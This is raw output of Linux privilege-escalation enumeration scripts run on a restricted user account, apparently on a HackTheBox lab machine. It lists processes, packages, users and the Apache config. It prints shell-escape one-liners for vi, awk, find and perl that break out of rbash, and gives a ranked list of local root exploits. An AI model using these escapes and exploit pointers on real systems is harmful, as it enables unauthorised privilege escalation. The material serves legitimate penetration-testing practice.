  1984. zeitgeist-core 0.9.16-0.2+b1 event logging framework - engine
  1985. zenity 3.22.0-1+b1 Display graphical dialog boxes from shell scripts
  1986. zenity-common 3.22.0-1 Display graphical dialog boxes from shell scripts (common files)
  1987. zlib1g:i386 1:1.2.8.dfsg-5 compression library - runtime
  1988.  
  1989. [+] Current processes
  1990. USER PID START TIME COMMAND
  1991. root 1 04:30 0:02 /sbin/init
  1992. root 2 04:30 0:00 [kthreadd]
  1993. root 3 04:30 0:00 [ksoftirqd/0]
  1994. root 5 04:30 0:00 [kworker/0:0H]
  1995. root 7 04:30 0:00 [rcu_sched]
  1996. root 8 04:30 0:00 [rcu_bh]
  1997. root 9 04:30 0:00 [migration/0]
  1998. root 10 04:30 0:00 [lru-add-drain]
  1999. root 11 04:30 0:00 [watchdog/0]
  2000. root 12 04:30 0:00 [cpuhp/0]
  2001. root 13 04:30 0:00 [kdevtmpfs]
  2002. root 14 04:30 0:00 [netns]
  2003. root 15 04:30 0:00 [khungtaskd]
  2004. root 16 04:30 0:00 [oom_reaper]
  2005. root 17 04:30 0:00 [writeback]
  2006. root 18 04:30 0:00 [kcompactd0]
  2007. root 19 04:30 0:00 [ksmd]
  2008. root 21 04:30 0:00 [crypto]
  2009. root 22 04:30 0:00 [kintegrityd]
  2010. root 23 04:30 0:00 [bioset]
  2011. root 24 04:30 0:00 [kblockd]
  2012. root 25 04:30 0:00 [devfreq_wq]
  2013. root 26 04:30 0:00 [watchdogd]
  2014. root 27 04:30 0:00 [kswapd0]
  2015. root 28 04:30 0:00 [vmstat]
  2016. root 40 04:30 0:00 [kthrotld]
  2017. root 41 04:30 0:00 [ipv6_addrconf]
  2018. root 83 04:30 0:00 [ata_sff]
  2019. root 84 04:30 0:00 [scsi_eh_0]
  2020. root 85 04:30 0:00 [scsi_eh_1]
  2021. root 86 04:30 0:00 [scsi_tmf_0]
  2022. root 87 04:30 0:00 [scsi_tmf_1]
  2023. root 88 04:30 0:00 [scsi_eh_2]
  2024. root 89 04:30 0:00 [vmw_pvscsi_wq_1]
  2025. root 90 04:30 0:00 [scsi_tmf_2]
  2026. root 91 04:30 0:00 [bioset]
  2027. root 92 04:30 0:00 [kworker/u2:2]
  2028. root 127 04:30 0:00 [bioset]
  2029. root 130 04:30 0:00 [kworker/0:1H]
  2030. root 167 04:30 0:00 [jbd2/sda1-8]
  2031. root 168 04:30 0:00 [ext4-rsv-conver]
  2032. root 195 04:30 0:01 /lib/systemd/systemd-journald
  2033. root 201 04:30 0:00 [kauditd]
  2034. root 205 04:30 0:00 /lib/systemd/systemd-udevd
  2035. systemd+ 272 04:30 0:00 /lib/systemd/systemd-timesyncd
  2036. root 273 04:30 0:00 [nfit]
  2037. root 276 04:30 0:00 [ttm_swap]
  2038. root 330 04:30 0:00 /lib/systemd/systemd-logind
  2039. root 331 04:30 0:00 /usr/sbin/rsyslogd
  2040. root 332 04:30 0:00 /usr/sbin/ModemManager
  2041. root 333 04:30 0:00 /bin/sh
  2042. rtkit 340 04:30 0:00 /usr/lib/rtkit/rtkit-daemon
  2043. avahi 341 04:30 0:02 avahi-daemon:
  2044. message+ 342 04:30 0:00 /usr/bin/dbus-daemon
  2045. root 381 04:30 0:07 /usr/lib/jvm/java-8-openjdk-i386//bin/java
  2046. root 386 04:30 0:00 /usr/lib/accountsservice/accounts-daemon
  2047. root 387 04:30 0:00 /usr/sbin/NetworkManager
  2048. root 391 04:30 0:00 /usr/sbin/cron
  2049. avahi 399 04:30 0:00 avahi-daemon:
  2050. root 415 04:30 0:00 /usr/lib/policykit-1/polkitd
  2051. root 530 04:30 0:00 /usr/sbin/sshd
  2052. root 538 04:30 0:00 /usr/sbin/minissdpd
  2053. root 549 04:30 0:00 /usr/sbin/gdm3
  2054. root 556 04:30 0:00 gdm-session-worker
  2055. Debian-+ 573 04:30 0:00 /lib/systemd/systemd
  2056. Debian-+ 575 04:30 0:00 (sd-pam)
  2057. Debian-+ 579 04:30 0:00 /usr/lib/gdm3/gdm-wayland-session
  2058. root 580 04:30 0:00 /usr/sbin/apache2
  2059. Debian-+ 583 04:30 0:00 /usr/bin/dbus-daemon
  2060. www-data 585 04:30 0:00 /usr/sbin/apache2
  2061. www-data 586 04:30 0:00 /usr/sbin/apache2
  2062. Debian-+ 643 04:30 0:00 /usr/lib/gnome-session/gnome-session-binary
  2063. Debian-+ 651 04:30 0:15 /usr/bin/gnome-shell
  2064. root 673 04:30 0:00 /usr/lib/upower/upowerd
  2065. Debian-+ 699 04:30 0:00 /usr/bin/Xwayland
  2066. Debian-+ 703 04:30 0:00 /usr/lib/at-spi2-core/at-spi-bus-launcher
  2067. Debian-+ 708 04:30 0:00 /usr/bin/dbus-daemon
  2068. Debian-+ 710 04:30 0:00 /usr/lib/at-spi2-core/at-spi2-registryd
  2069. Debian-+ 713 04:30 0:00 /usr/bin/pulseaudio
  2070. root 772 04:30 0:00 sshd:
  2071. root 781 04:30 0:00 /sbin/wpa_supplicant
  2072. root 782 04:30 0:00 /usr/lib/packagekit/packagekitd
  2073. Debian-+ 785 04:30 0:00 /usr/lib/gnome-settings-daemon/gnome-settings-daemon
  2074. mindy 795 04:30 0:00 /lib/systemd/systemd
  2075. mindy 796 04:30 0:00 (sd-pam)
  2076. mindy 806 04:30 0:00 sshd:
  2077. colord 807 04:30 0:00 /usr/lib/colord/colord
  2078. mindy 811 04:30 0:00 -rbash
  2079. root 864 04:31 0:00 sshd:
  2080. mindy 871 04:31 0:00 sshd:
  2081. mindy 872 04:31 0:00 -rbash
  2082. mindy 892 04:31 0:00 perl
  2083. root 1045 04:35 0:00 /usr/sbin/cupsd
  2084. root 1047 04:35 0:00 /usr/sbin/cups-browsed
  2085. root 1179 04:43 0:00 sshd:
  2086. mindy 1185 04:43 0:00 sshd:
  2087. mindy 1186 04:43 0:00 -rbash
  2088. mindy 1382 04:48 0:00 bash
  2089. root 1521 04:53 0:00 sshd:
  2090. mindy 1527 04:53 0:00 sshd:
  2091. mindy 1528 04:53 0:00 -rbash
  2092. mindy 1632 04:53 0:00 bash
  2093. mindy 1704 04:56 0:00 bash
  2094. mindy 1736 04:57 0:00 bash
  2095. root 1792 04:59 0:00 sshd:
  2096. mindy 1802 04:59 0:00 sshd:
  2097. mindy 1803 04:59 0:00 -rbash
  2098. mindy 1931 04:59 0:00 /bin/bash
  2099. mindy 1963 05:00 0:00 bash
  2100. root 2011 05:01 0:00 [kworker/0:0]
  2101. root 2219 05:06 0:00 [kworker/0:2]
  2102. root 2242 05:07 0:00 [kworker/u2:0]
  2103. mindy 2331 05:10 0:00 bash
  2104. root 2375 05:11 0:00 [kworker/0:1]
  2105. mindy 2436 05:13 0:00 bash
  2106. mindy 2991 05:13 0:00 python
  2107. mindy 3188 05:13 0:00 /bin/sh
  2108. mindy 3189 05:13 0:00 ps
  2109. mindy 3190 05:13 0:00 awk
  2110.  
  2111. [+] Apache Version and Modules
  2112. Server version: Apache/2.4.25 (Debian)
  2113. Server built: 2017-07-18T18:37:33
  2114. Loaded Modules:
  2115. core_module (static)
  2116. so_module (static)
  2117. watchdog_module (static)
  2118. http_module (static)
  2119. log_config_module (static)
  2120. logio_module (static)
  2121. version_module (static)
  2122. unixd_module (static)
  2123. access_compat_module (shared)
  2124. alias_module (shared)
  2125. auth_basic_module (shared)
  2126. authn_core_module (shared)
  2127. authn_file_module (shared)
  2128. authz_core_module (shared)
  2129. authz_host_module (shared)
  2130. authz_user_module (shared)
  2131. autoindex_module (shared)
  2132. deflate_module (shared)
  2133. dir_module (shared)
  2134. env_module (shared)
  2135. filter_module (shared)
  2136. mime_module (shared)
  2137. mpm_event_module (shared)
  2138. negotiation_module (shared)
  2139. reqtimeout_module (shared)
  2140. setenvif_module (shared)
  2141. status_module (shared)
  2142. Compiled in modules:
  2143. core.c
  2144. mod_so.c
  2145. mod_watchdog.c
  2146. http_core.c
  2147. mod_log_config.c
  2148. mod_logio.c
  2149. mod_version.c
  2150. mod_unixd.c
  2151.  
  2152. [+] Apache Config File
  2153. # This is the main Apache server configuration file. It contains the
  2154. # configuration directives that give the server its instructions.
  2155. # See http://httpd.apache.org/docs/2.4/ for detailed information about
  2156. # the directives and /usr/share/doc/apache2/README.Debian about Debian specific
  2157. # hints.
  2158. #
  2159. #
  2160. # Summary of how the Apache 2 configuration works in Debian:
  2161. # The Apache 2 web server configuration in Debian is quite different to
  2162. # upstream's suggested way to configure the web server. This is because Debian's
  2163. # default Apache2 installation attempts to make adding and removing modules,
  2164. # virtual hosts, and extra configuration directives as flexible as possible, in
  2165. # order to make automating the changes and administering the server as easy as
  2166. # possible.
  2167. # It is split into several files forming the configuration hierarchy outlined
  2168. # below, all located in the /etc/apache2/ directory:
  2169. #
  2170. # /etc/apache2/
  2171. # |-- apache2.conf
  2172. # | `-- ports.conf
  2173. # |-- mods-enabled
  2174. # | |-- *.load
  2175. # | `-- *.conf
  2176. # |-- conf-enabled
  2177. # | `-- *.conf
  2178. # `-- sites-enabled
  2179. # `-- *.conf
  2180. #
  2181. #
  2182. # * apache2.conf is the main configuration file (this file). It puts the pieces
  2183. # together by including all remaining configuration files when starting up the
  2184. # web server.
  2185. #
  2186. # * ports.conf is always included from the main configuration file. It is
  2187. # supposed to determine listening ports for incoming connections which can be
  2188. # customized anytime.
  2189. #
  2190. # * Configuration files in the mods-enabled/, conf-enabled/ and sites-enabled/
  2191. # directories contain particular configuration snippets which manage modules,
  2192. # global configuration fragments, or virtual host configurations,
  2193. # respectively.
  2194. #
  2195. # They are activated by symlinking available configuration files from their
  2196. # respective *-available/ counterparts. These should be managed by using our
  2197. # helpers a2enmod/a2dismod, a2ensite/a2dissite and a2enconf/a2disconf. See
  2198. # their respective man pages for detailed information.
  2199. #
  2200. # * The binary is called apache2. Due to the use of environment variables, in
  2201. # the default configuration, apache2 needs to be started/stopped with
  2202. # /etc/init.d/apache2 or apache2ctl. Calling /usr/bin/apache2 directly will not
  2203. # work with the default configuration.
  2204. # Global configuration
  2205. #
  2206. #
  2207. # ServerRoot: The top of the directory tree under which the server's
  2208. # configuration, error, and log files are kept.
  2209. #
  2210. # NOTE! If you intend to place this on an NFS (or otherwise network)
  2211. # mounted filesystem then please read the Mutex documentation (available
  2212. # at <URL:http://httpd.apache.org/docs/2.4/mod/core.html#mutex>);
  2213. # you will save yourself a lot of trouble.
  2214. #
  2215. # Do NOT add a slash at the end of the directory path.
  2216. #
  2217. #ServerRoot "/etc/apache2"
  2218. #
  2219. # The accept serialization lock file MUST BE STORED ON A LOCAL DISK.
  2220. #
  2221. #Mutex file:${APACHE_LOCK_DIR} default
  2222. #
  2223. # The directory where shm and other runtime files will be stored.
  2224. #
  2225. DefaultRuntimeDir ${APACHE_RUN_DIR}
  2226. #
  2227. # PidFile: The file in which the server should record its process
  2228. # identification number when it starts.
  2229. # This needs to be set in /etc/apache2/envvars
  2230. #
  2231. PidFile ${APACHE_PID_FILE}
  2232. #
  2233. # Timeout: The number of seconds before receives and sends time out.
  2234. #
  2235. Timeout 300
  2236. #
  2237. # KeepAlive: Whether or not to allow persistent connections (more than
  2238. # one request per connection). Set to "Off" to deactivate.
  2239. #
  2240. KeepAlive On
  2241. #
  2242. # MaxKeepAliveRequests: The maximum number of requests to allow
  2243. # during a persistent connection. Set to 0 to allow an unlimited amount.
  2244. # We recommend you leave this number high, for maximum performance.
  2245. #
  2246. MaxKeepAliveRequests 100
  2247. #
  2248. # KeepAliveTimeout: Number of seconds to wait for the next request from the
  2249. # same client on the same connection.
  2250. #
  2251. KeepAliveTimeout 5
  2252. # These need to be set in /etc/apache2/envvars
  2253. User ${APACHE_RUN_USER}
  2254. Group ${APACHE_RUN_GROUP}
  2255. #
  2256. # HostnameLookups: Log the names of clients or just their IP addresses
  2257. # e.g., www.apache.org (on) or 204.62.129.132 (off).
  2258. # The default is off because it'd be overall better for the net if people
  2259. # had to knowingly turn this feature on, since enabling it means that
  2260. # each client request will result in AT LEAST one lookup request to the
  2261. # nameserver.
  2262. #
  2263. HostnameLookups Off
  2264. # ErrorLog: The location of the error log file.
  2265. # If you do not specify an ErrorLog directive within a <VirtualHost>
  2266. # container, error messages relating to that virtual host will be
  2267. # logged here. If you *do* define an error logfile for a <VirtualHost>
  2268. # container, that host's errors will be logged there and not here.
  2269. #
  2270. ErrorLog ${APACHE_LOG_DIR}/error.log
  2271. #
  2272. # LogLevel: Control the severity of messages logged to the error_log.
  2273. # Available values: trace8, ..., trace1, debug, info, notice, warn,
  2274. # error, crit, alert, emerg.
  2275. # It is also possible to configure the log level for particular modules, e.g.
  2276. # "LogLevel info ssl:warn"
  2277. #
  2278. LogLevel warn
  2279. # Include module configuration:
  2280. IncludeOptional mods-enabled/*.load
  2281. IncludeOptional mods-enabled/*.conf
  2282. # Include list of ports to listen on
  2283. Include ports.conf
  2284. # Sets the default security model of the Apache2 HTTPD server. It does
  2285. # not allow access to the root filesystem outside of /usr/share and /var/www.
  2286. # The former is used by web applications packaged in Debian,
  2287. # the latter may be used for local directories served by the web server. If
  2288. # your system is serving content from a sub-directory in /srv you must allow
  2289. # access here, or in any related virtual host.
  2290. <Directory />
  2291. Options FollowSymLinks
  2292. AllowOverride None
  2293. Require all denied
  2294. </Directory>
  2295. <Directory /usr/share>
  2296. AllowOverride None
  2297. Require all granted
  2298. </Directory>
  2299. <Directory /var/www/>
  2300. Options Indexes FollowSymLinks
  2301. AllowOverride None
  2302. Require all granted
  2303. </Directory>
  2304. #<Directory /srv/>
  2305. # Options Indexes FollowSymLinks
  2306. # AllowOverride None
  2307. # Require all granted
  2308. #</Directory>
  2309. # AccessFileName: The name of the file to look for in each directory
  2310. # for additional configuration directives. See also the AllowOverride
  2311. # directive.
  2312. #
  2313. AccessFileName .htaccess
  2314. #
  2315. # The following lines prevent .htaccess and .htpasswd files from being
  2316. # viewed by Web clients.
  2317. #
  2318. <FilesMatch "^\.ht">
  2319. Require all denied
  2320. </FilesMatch>
  2321. #
  2322. # The following directives define some format nicknames for use with
  2323. # a CustomLog directive.
  2324. #
  2325. # These deviate from the Common Log Format definitions in that they use %O
  2326. # (the actual bytes sent including headers) instead of %b (the size of the
  2327. # requested file), because the latter makes it impossible to detect partial
  2328. # requests.
  2329. #
  2330. # Note that the use of %{X-Forwarded-For}i instead of %h is not recommended.
  2331. # Use mod_remoteip instead.
  2332. #
  2333. LogFormat "%v:%p %h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" vhost_combined
  2334. LogFormat "%h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" combined
  2335. LogFormat "%h %l %u %t \"%r\" %>s %O" common
  2336. LogFormat "%{Referer}i -> %U" referer
  2337. LogFormat "%{User-agent}i" agent
  2338. # Include of directories ignores editors' and dpkg's backup files,
  2339. # see README.Debian for details.
  2340. # Include generic snippets of statements
  2341. IncludeOptional conf-enabled/*.conf
  2342. # Include the virtual host configurations:
  2343. IncludeOptional sites-enabled/*.conf
  2344. # vim: syntax=apache ts=4 sw=4 sts=4 sr noet
  2345.  
  2346. [+] Sudo Version (Check out http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=sudo)
  2347.  
  2348. [*] IDENTIFYING PROCESSES AND PACKAGES RUNNING AS ROOT OR OTHER SUPERUSER...
  2349.  
  2350. root 84 04:30 0:00 [scsi_eh_0]
  2351. root 1179 04:43 0:00 sshd:
  2352. root 2375 05:11 0:00 [kworker/0:1]
  2353. root 21 04:30 0:00 [crypto]
  2354. root 2 04:30 0:00 [kthreadd]
  2355. root 530 04:30 0:00 /usr/sbin/sshd
  2356. root 1047 04:35 0:00 /usr/sbin/cups-browsed
  2357. Possible Related Packages:
  2358. cups-browsed 1.11.6-3 OpenPrinting CUPS Filters - cups-browsed
  2359. root 781 04:30 0:00 /sbin/wpa_supplicant
  2360. root 772 04:30 0:00 sshd:
  2361. root 41 04:30 0:00 [ipv6_addrconf]
  2362. root 88 04:30 0:00 [scsi_eh_2]
  2363. root 330 04:30 0:00 /lib/systemd/systemd-logind
  2364. root 7 04:30 0:00 [rcu_sched]
  2365. root 17 04:30 0:00 [writeback]
  2366. root 127 04:30 0:00 [bioset]
  2367. root 15 04:30 0:00 [khungtaskd]
  2368. root 85 04:30 0:00 [scsi_eh_1]
  2369. root 2219 05:06 0:00 [kworker/0:2]
  2370. root 276 04:30 0:00 [ttm_swap]
  2371. root 16 04:30 0:00 [oom_reaper]
  2372. root 332 04:30 0:00 /usr/sbin/ModemManager
  2373. root 130 04:30 0:00 [kworker/0:1H]
  2374. root 168 04:30 0:00 [ext4-rsv-conver]
  2375. root 1045 04:35 0:00 /usr/sbin/cupsd
  2376. root 864 04:31 0:00 sshd:
  2377. root 538 04:30 0:00 /usr/sbin/minissdpd
  2378. Possible Related Packages:
  2379. minissdpd 1.2.20130907-4.1 keep memory of all UPnP devices that announced themselves
  2380. root 10 04:30 0:00 [lru-add-drain]
  2381. root 28 04:30 0:00 [vmstat]
  2382. root 782 04:30 0:00 /usr/lib/packagekit/packagekitd
  2383. root 549 04:30 0:00 /usr/sbin/gdm3
  2384. Possible Related Packages:
  2385. gdm3 3.22.3-3 GNOME Display Manager
  2386. root 8 04:30 0:00 [rcu_bh]
  2387. root 18 04:30 0:00 [kcompactd0]
  2388. root 90 04:30 0:00 [scsi_tmf_2]
  2389. root 86 04:30 0:00 [scsi_tmf_0]
  2390. root 26 04:30 0:00 [watchdogd]
  2391. root 1521 04:53 0:00 sshd:
  2392. root 205 04:30 0:00 /lib/systemd/systemd-udevd
  2393. root 5 04:30 0:00 [kworker/0:0H]
  2394. root 273 04:30 0:00 [nfit]
  2395. root 87 04:30 0:00 [scsi_tmf_1]
  2396. root 11 04:30 0:00 [watchdog/0]
  2397. root 415 04:30 0:00 /usr/lib/policykit-1/polkitd
  2398. root 1792 04:59 0:00 sshd:
  2399. root 22 04:30 0:00 [kintegrityd]
  2400. root 89 04:30 0:00 [vmw_pvscsi_wq_1]
  2401. root 201 04:30 0:00 [kauditd]
  2402. root 91 04:30 0:00 [bioset]
  2403. root 381 04:30 0:07 /usr/lib/jvm/java-8-openjdk-i386//bin/java
  2404. Possible Related Packages:
  2405. ca-certificates-java 20170531+nmu1 Common CA certificates (JKS keystore)
  2406. default-java-plugin 2:1.8-58 Default Java Plugin for running applets and Java Web Start applications
  2407. gir1.2-javascriptcoregtk-4.0:i386 2.16.3-2 JavaScript engine library from WebKitGTK+ - GObject introspection data
  2408. gjs 1.46.0-1+b2 Mozilla-based javascript bindings for the GNOME platform
  2409. java-common 0.58 Base package for Java runtimes
  2410. libatk-wrapper-java 0.33.3-13 ATK implementation for Java using JNI
  2411. libatk-wrapper-java-jni:i386 0.33.3-13 ATK implementation for Java using JNI (JNI bindings)
  2412. libgjs0e 1.46.0-1+b2 Mozilla-based javascript bindings for the GNOME platform
  2413. libhsqldb1.8.0-java 1.8.0.10+dfsg-7 Java SQL database engine
  2414. libjavascriptcoregtk-4.0-18:i386 2.16.3-2 JavaScript engine library from WebKitGTK+
  2415. libreoffice-java-common 1:5.2.7-1 office productivity suite -- arch-independent Java support files
  2416. libservlet3.1-java 8.5.14-1+deb9u1 Servlet 3.1, JSP 2.3, EL 3.0 and WebSocket 1.0 Java API classes
  2417. root 580 04:30 0:00 /usr/sbin/apache2
  2418. Possible Related Packages:
  2419. apache2 2.4.25-3+deb9u2 Apache HTTP Server
  2420. apache2-bin 2.4.25-3+deb9u2 Apache HTTP Server (modules and other binary files)
  2421. apache2-data 2.4.25-3+deb9u2 Apache HTTP Server (common files)
  2422. apache2-utils 2.4.25-3+deb9u2 Apache HTTP Server (utility programs for web servers)
  2423. libapache2-mod-dnssd 0.6-3.1 Zeroconf support for Apache 2 via avahi
  2424. root 19 04:30 0:00 [ksmd]
  2425. root 387 04:30 0:00 /usr/sbin/NetworkManager
  2426. Possible Related Packages:
  2427. gir1.2-networkmanager-1.0:i386 1.6.2-3 GObject introspection data for NetworkManager
  2428. libnm0:i386 1.6.2-3 GObject-based client library for NetworkManager
  2429. root 83 04:30 0:00 [ata_sff]
  2430. root 167 04:30 0:00 [jbd2/sda1-8]
  2431. root 331 04:30 0:00 /usr/sbin/rsyslogd
  2432. root 92 04:30 0:00 [kworker/u2:2]
  2433. root 12 04:30 0:00 [cpuhp/0]
  2434. root 195 04:30 0:01 /lib/systemd/systemd-journald
  2435. root 3 04:30 0:00 [ksoftirqd/0]
  2436. root 27 04:30 0:00 [kswapd0]
  2437. root 24 04:30 0:00 [kblockd]
  2438. root 673 04:30 0:00 /usr/lib/upower/upowerd
  2439. root 1 04:30 0:02 /sbin/init
  2440. Possible Related Packages:
  2441. hp-ppd 0.9-0.3 HP Postscript Printer Definition (PPD) files
  2442. init 1.48 metapackage ensuring an init system is installed
  2443. init-system-helpers 1.48 helper tools for all init systems
  2444. initramfs-tools 0.130 generic modular initramfs generator (automation)
  2445. initramfs-tools-core 0.130 generic modular initramfs generator (core tools)
  2446. libklibc 2.0.4-9 minimal libc subset for use with initramfs
  2447. lsb-base 9.20161125 Linux Standard Base init script functionality
  2448. ncurses-base 6.0+20161126-1 basic terminal type definitions
  2449. ncurses-term 6.0+20161126-1 additional terminal type definitions
  2450. sysvinit-utils 2.88dsf-59.9 System-V-like utilities
  2451. xinit 1.3.4-3+b1 X server initialisation tool
  2452. root 391 04:30 0:00 /usr/sbin/cron
  2453. Possible Related Packages:
  2454. anacron 2.3-24 cron-like program that doesn't go by time
  2455. cron 3.0pl1-128+b1 process scheduling daemon
  2456. root 25 04:30 0:00 [devfreq_wq]
  2457. root 2011 05:01 0:00 [kworker/0:0]
  2458. root 556 04:30 0:00 gdm-session-worker
  2459. root 386 04:30 0:00 /usr/lib/accountsservice/accounts-daemon
  2460. root 9 04:30 0:00 [migration/0]
  2461. root 13 04:30 0:00 [kdevtmpfs]
  2462. root 2242 05:07 0:00 [kworker/u2:0]
  2463. root 333 04:30 0:00 /bin/sh
  2464. root 40 04:30 0:00 [kthrotld]
  2465. root 14 04:30 0:00 [netns]
  2466. root 23 04:30 0:00 [bioset]
  2467.  
  2468. [*] ENUMERATING INSTALLED LANGUAGES/TOOLS FOR SPLOIT BUILDING...
  2469.  
  2470. [+] Installed Tools
  2471. /usr/bin/awk
  2472. /usr/bin/perl
  2473. /usr/bin/python
  2474. /usr/bin/vi
  2475. /usr/bin/find
  2476. /bin/netcat
  2477. /bin/nc
  2478. /usr/bin/wget
  2479.  
  2480. [+] Related Shell Escape Sequences...
  2481.  
  2482. vi--> :!bash
  2483. vi--> :set shell=/bin/bash:shell
  2484. awk--> awk 'BEGIN {system("/bin/bash")}'
  2485. find--> find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \;
  2486. perl--> perl -e 'exec "/bin/bash";'
  2487.  
  2488. [*] FINDING RELEVENT PRIVILEGE ESCALATION EXPLOITS...
  2489.  
  2490. Note: Exploits relying on a compile/scripting language not detected on this system are marked with a '**' but should still be tested!
  2491.  
  2492. The following exploits are ranked higher in probability of success because this script detected a related running process, OS, or mounted file system
  2493. - Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit || http://www.exploit-db.com/exploits/5720 || Language=python
  2494. - Ubuntu/Debian Apache 1.3.33/1.3.34 (CGI TTY) Local Root Exploit || http://www.exploit-db.com/exploits/3384 || Language=c
  2495.  
  2496. The following exploits are applicable to this kernel version and should be investigated as well
  2497. - Kernel ia32syscall Emulation Privilege Escalation || http://www.exploit-db.com/exploits/15023 || Language=c
  2498. - Sendpage Local Privilege Escalation || http://www.exploit-db.com/exploits/19933 || Language=ruby**
  2499. - CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) || http://www.exploit-db.com/exploits/15944 || Language=c
  2500. - CAP_SYS_ADMIN to root Exploit || http://www.exploit-db.com/exploits/15916 || Language=c
  2501. - MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c
  2502. - open-time Capability file_ns_capable() Privilege Escalation || http://www.exploit-db.com/exploits/25450 || Language=c
  2503. - open-time Capability file_ns_capable() - Privilege Escalation Vulnerability || http://www.exploit-db.com/exploits/25307 || Language=c
  2504.  
  2505. Finished
  2506. =================================================================================================
  2507.  
  2508. #########################################################
  2509. # Local Linux Enumeration & Privilege Escalation Script #
  2510. #########################################################
  2511. # www.rebootuser.com
  2512. # 
  2513.  
  2514. Debug Info
  2515. thorough tests = disabled
  2516.  
  2517.  
  2518. Scan started at:
  2519. Fri Jan 5 05:13:49 EST 2018
  2520. 
  2521.  
  2522. ### SYSTEM ##############################################
  2523. Kernel information:
  2524. Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686 GNU/Linux
  2525.  
  2526.  
  2527. Kernel information (continued):
  2528. Linux version 4.9.0-3-686-pae (debian-kernel@lists.debian.org) (gcc version 6.3.0 20170516 (Debian 6.3.0-18) ) #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06)
  2529.  
  2530.  
  2531. Specific release information:
  2532. PRETTY_NAME="Debian GNU/Linux 9 (stretch)"
  2533. NAME="Debian GNU/Linux"
  2534. VERSION_ID="9"
  2535. VERSION="9 (stretch)"
  2536. ID=debian
  2537. HOME_URL="https://www.debian.org/"
  2538. SUPPORT_URL="https://www.debian.org/support"
  2539. BUG_REPORT_URL="https://bugs.debian.org/"
  2540.  
  2541.  
  2542. Hostname:
  2543. solidstate
  2544.  
  2545.  
  2546. ### USER/GROUP ##########################################
  2547. Current user/group info:
  2548. uid=1001(mindy) gid=1001(mindy) groups=1001(mindy)
  2549.  
  2550.  
  2551. Users that have previously logged onto the system:
  2552. Username Port From Latest
  2553. root pts/0 10.10.14.2 Sat Dec 23 19:21:34 -0500 2017
  2554. mindy pts/3 10.10.17.78 Fri Jan 5 04:59:09 -0500 2018
  2555.  
  2556.  
  2557. Who else is logged on:
  2558. 05:13:49 up 43 min, 5 users, load average: 0.21, 0.13, 0.04
  2559. USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
  2560. mindy pts/0 10.10.14.239 04:30 5.00s 0.16s 0.01s bash
  2561. mindy pts/1 10.10.14.18 04:31 9:24 0.06s 0.00s bash
  2562. mindy pts/2 10.10.15.219 04:43 37.00s 0.31s 0.08s /bin/bash
  2563. mindy pts/3 10.10.17.78 04:59 5.00s 0.21s 0.00s bash
  2564. mindy pts/4 10.10.15.21 04:53 5.00s 0.14s 0.00s /bin/bash ./LinEnum.sh
  2565.  
  2566.  
  2567. Group memberships:
  2568. uid=0(root) gid=0(root) groups=0(root)
  2569. uid=1(daemon) gid=1(daemon) groups=1(daemon)
  2570. uid=2(bin) gid=2(bin) groups=2(bin)
  2571. uid=3(sys) gid=3(sys) groups=3(sys)
  2572. uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
  2573. uid=5(games) gid=60(games) groups=60(games)
  2574. uid=6(man) gid=12(man) groups=12(man)
  2575. uid=7(lp) gid=7(lp) groups=7(lp)
  2576. uid=8(mail) gid=8(mail) groups=8(mail)
  2577. uid=9(news) gid=9(news) groups=9(news)
  2578. uid=10(uucp) gid=10(uucp) groups=10(uucp)
  2579. uid=13(proxy) gid=13(proxy) groups=13(proxy)
  2580. uid=33(www-data) gid=33(www-data) groups=33(www-data)
  2581. uid=34(backup) gid=34(backup) groups=34(backup)
  2582. uid=38(list) gid=38(list) groups=38(list)
  2583. uid=39(irc) gid=39(irc) groups=39(irc)
  2584. uid=41(gnats) gid=41(gnats) groups=41(gnats)
  2585. uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
  2586. uid=100(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync)
  2587. uid=101(systemd-network) gid=103(systemd-network) groups=103(systemd-network)
  2588. uid=102(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve)
  2589. uid=103(systemd-bus-proxy) gid=105(systemd-bus-proxy) groups=105(systemd-bus-proxy)
  2590. uid=104(_apt) gid=65534(nogroup) groups=65534(nogroup)
  2591. uid=105(usbmux) gid=46(plugdev) groups=46(plugdev)
  2592. uid=106(rtkit) gid=110(rtkit) groups=110(rtkit)
  2593. uid=107(dnsmasq) gid=65534(nogroup) groups=65534(nogroup)
  2594. uid=108(messagebus) gid=111(messagebus) groups=111(messagebus)
  2595. uid=109(geoclue) gid=115(geoclue) groups=115(geoclue)
  2596. uid=110(avahi) gid=117(avahi) groups=117(avahi)
  2597. uid=111(colord) gid=118(colord) groups=118(colord)
  2598. uid=112(saned) gid=119(saned) groups=119(saned),116(scanner)
  2599. uid=113(speech-dispatcher) gid=29(audio) groups=29(audio)
  2600. uid=114(pulse) gid=120(pulse) groups=120(pulse),29(audio)
  2601. uid=115(hplip) gid=7(lp) groups=7(lp)
  2602. uid=116(Debian-gdm) gid=122(Debian-gdm) groups=122(Debian-gdm)
  2603. uid=117(sshd) gid=65534(nogroup) groups=65534(nogroup)
  2604. uid=1000(james) gid=1000(osboxes) groups=1000(osboxes),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(bluetooth),114(lpadmin),116(scanner)
  2605. uid=1001(mindy) gid=1001(mindy) groups=1001(mindy)
  2606.  
  2607.  
  2608. Sample entires from /etc/passwd (searching for uid values 0, 500, 501, 502, 1000, 1001, 1002, 2000, 2001, 2002):
  2609. root:x:0:0:root:/root:/bin/bash
  2610. james:x:1000:1000:james:/home/james/:/bin/bash
  2611. mindy:x:1001:1001:mindy:/home/mindy:/bin/rbash
  2612.  
  2613.  
  2614. Super user account(s):
  2615. root
  2616.  
  2617.  
  2618. Are permissions on /home directories lax:
  2619. total 16K
  2620. drwxr-xr-x 4 root root 4.0K Aug 22 11:37 .
